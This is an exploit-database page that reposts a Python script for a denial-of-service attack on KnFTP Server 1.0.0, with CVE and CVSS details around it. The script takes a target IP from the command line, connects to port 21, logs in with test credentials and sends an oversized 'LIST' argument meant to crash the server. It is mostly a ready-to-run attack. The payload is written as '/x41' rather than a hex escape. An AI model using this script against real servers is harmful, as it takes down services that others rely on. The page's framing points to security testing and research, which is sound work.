Advertisement






KnFTP Server 1.0.0 Denial Of Service

CVE Category Price Severity
CVE-2019-9458 CWE-399 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-07-03
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/S:U/C:N/I:N/A:H 0.7472 0.88394

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070017

Below is a copy:

KnFTP Server 1.0.0 Denial Of Service
#!/usr/bin/python
#
# e-mail: [email protected]
#
# Date: 06/13/2021 - 13 jun
#
# Version Vulnerable: KnFTP 1.0.0 Server
#
# OS Tested: Windows XP PACK 3 Brazilian

import socket
import sys

if len(sys.argv) != 2:
    print "########################################################"
    print "#                                                      #"
    print "#  KnFTP 1.0.0 Server - 'LIST' Denied of Service       #"
    print "#                                                      #"
    print "#              Author: Fernando Mengali                #"
    print "#                                                      #"
    print "#              Usage: exploit.py <IP>                  #"
    print "#                                                      #"
    print "########################################################"
    sys.exit(1)

target = sys.argv[1]

payload = "/x41"*500

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, 21))
    print "[+] Conectado com sucesso"
except:
    print "[-] Falha ao conectar para o servidor..."
    sys.exit(0)
s.recv(1024)
print "[+] Autenticando..."
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('LIST '+payload+'\r\n')
print "[+] Enviando pacote crafted..."
s.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum